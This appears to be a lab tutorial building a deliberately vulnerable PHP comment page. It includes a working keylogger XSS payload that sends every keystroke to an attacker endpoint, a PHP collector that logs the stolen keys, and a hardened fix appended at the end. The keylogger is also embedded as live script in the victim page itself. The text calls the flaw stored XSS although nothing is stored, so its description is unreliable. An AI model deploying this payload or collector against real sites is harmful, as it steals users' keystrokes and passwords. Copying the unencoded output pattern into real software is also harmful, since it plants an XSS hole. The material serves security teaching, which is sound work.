**A website containing an XSS vulnerability**

The website has a Stored XSS vulnerability. Create two folders, `hacker` and `victim`.

# Folder victim

**index.php**

```php
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Victim site</title>
</head>
<body>
  <h1>Post a comment</h1>
  <form action="index.php" method="POST">
    <label for="comment_title">Comment Title:</label>
    <br>
    <input type="text" id="comment_title" name="comment_title">
    <br>
    <br>
    <label for="comment_text">Comment:</label>
    <br>
    <textarea id="comment_text" name="comment_text" rows="12" cols="70"></textarea>
    <br>
    <br>
    <input type="submit" value="Post comment">
    <br>
  </form>
  <?php
  // Stop here until the form has actually been submitted
  // (empty() avoids the "undefined index" notice on a plain GET).
  if (empty($_POST["comment_title"])) {
      die("Nothing posted!");
  }
  ?>
  <h1>Processing the new post</h1>
  <div id="postarea">
    <p>Here is what was posted.</p>
    <?php
    // Dump the whole POST array (the original indexed $_POST[""], which never exists).
    echo "<pre>";
    print_r($_POST);
    echo "</pre>";
    ?>
  </div>
  <h2>New comments</h2>
  <div id="newcomment">
    <?php
    // Deliberately vulnerable: the submitted fields are written into the page
    // without any HTML encoding, so a comment containing <script> is executed.
    echo "<h3>" . $_POST["comment_title"] . "</h3>";
    echo "<p>" . $_POST["comment_text"] . "</p>";
    ?>
  </div>
  <script>
  // Keylogger: every key pressed on the page is POSTed to the attacker's endpoint.
  document.onkeypress = function (evt) {
    evt = evt || window.event;
    const key = String.fromCharCode(evt.charCode);
    if (key) {
      const param = encodeURI(key);
      fetch("http://localhost/hacker/keylog.php", {
        method: "POST",
        headers: { "Content-type": "application/x-www-form-urlencoded" },
        body: "key=" + param
      });
    }
  };
  </script>
</body>
</html>
```

![Screenshot (59)](https://hackmd.io/_uploads/H13PrtRQp.png)

**XSS attack**

The payload submitted as the comment:

```html
<script>
  document.onkeypress = function (evt) {
    evt = evt || window.event;
    const key = String.fromCharCode(evt.charCode);
    if (key) {
      const param = encodeURI(key);
      fetch("http://localhost/hacker/keylog.php", {
        method: "POST",
        headers: { "Content-type": "application/x-www-form-urlencoded" },
        body: "key=" + param
      });
    }
  };
</script>
```

# Folder hacker

**keylog.php**

```php
<?php
// Allow the cross-origin POST from the victim page (the original header was missing the colon).
header("Access-Control-Allow-Origin: *");
if (!empty($_POST["key"])) {
    // Append each received keystroke to the log file.
    $logfile = fopen("keylog.txt", "a+");
    fwrite($logfile, $_POST["key"]);
    fclose($logfile);
}
?>
```

![Screenshot (58)](https://hackmd.io/_uploads/S1oNHF0Qa.png)
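As an added example (not part of the original note), here is the comment-rendering block of the victim page with the fix a defender would apply: every user-supplied field is HTML-encoded before it is echoed, and a Content-Security-Policy header restricts script and fetch targets to the site's own origin. The helper name `h()` and the header values are assumptions, not anything from the note.

```php
<?php
// Added example: hardened replacement for the "newcomment" block of victim/index.php.
// Assumption: this file is included before any HTML output so headers can still be sent.

// Defence in depth: even if encoding were forgotten somewhere, this CSP stops an
// injected inline <script> from running and makes the browser refuse a fetch()
// to a different origin such as http://localhost/hacker/keylog.php.
header("Content-Security-Policy: default-src 'self'; script-src 'self'; connect-src 'self'");
header("X-Content-Type-Options: nosniff");

// Encode a user-supplied string for safe insertion into an HTML text node or attribute.
// ENT_QUOTES also encodes ' and ", so the value is safe inside quoted attributes too.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

// Read the posted fields with explicit defaults instead of indexing $_POST blindly.
$title = (string) ($_POST["comment_title"] ?? "");
$text  = (string) ($_POST["comment_text"] ?? "");

if ($title === "") {
    die("Nothing posted!");
}

// The keylogger payload from the note now renders as visible text:
// h("<script>...</script>") === "&lt;script&gt;...&lt;/script&gt;"
?>
<h2>New comments</h2>
<div id="newcomment">
  <h3><?= h($title) ?></h3>
  <p><?= nl2br(h($text)) ?></p>
</div>
```

The same rule applies when comments are persisted: store the raw text and encode at output time, for every place it is rendered.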